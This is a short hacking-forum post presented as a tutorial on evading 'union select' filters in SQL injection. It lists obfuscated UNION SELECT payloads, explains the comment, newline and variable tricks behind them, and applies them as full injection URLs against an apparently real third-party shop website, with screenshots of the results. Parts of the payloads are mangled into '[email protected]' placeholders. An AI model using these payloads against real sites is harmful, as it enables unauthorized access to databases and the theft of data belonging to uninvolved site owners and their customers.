Tutorial Uni0n 3elect Bypassing Pocket Reference

Discussion in 'Web Application Security & Hacking' started by admin, Feb 21, 2018.

  1. admin

    admin Administrator Staff Member

    [​IMG]

    7- Flow Control [Function To Control ID Output] Credit To Benzi

    Query

    PHP:
    ID=.4||!{f`id`}union-- a%[email protected]
    ID={f -5} union-- a%[email protected]
    PHP:
    || means "or" .
    [2] ! means not() .
    [3] {f} means timestamp .
    [4] `id` is the column .
    [5] --%0a means comment and new line .
    [6] the @ after is just to stick a char to select, @ is a temporary variable .
    PHP:
    http://www.bellajoias.com.br/categoria.php?id=3 And point(53,12) uni on sEL ect!1,2,3,4,5,6,7#
    [​IMG]

    PHP:
    http://www.bellajoias.com.br/categoria.php?id=3||!{f`id`}union-- a%[email protected],2,3,4,5,6,7#
    [​IMG]

    PHP:
    http://www.bellajoias.com.br/categoria.php?id={f -3}un ion-- a%0Asel [email protected],2,3,4,5,6,7#
    [​IMG]

    [email protected]
    My PGP key: https://goo.gl/triziq
     

Share This Page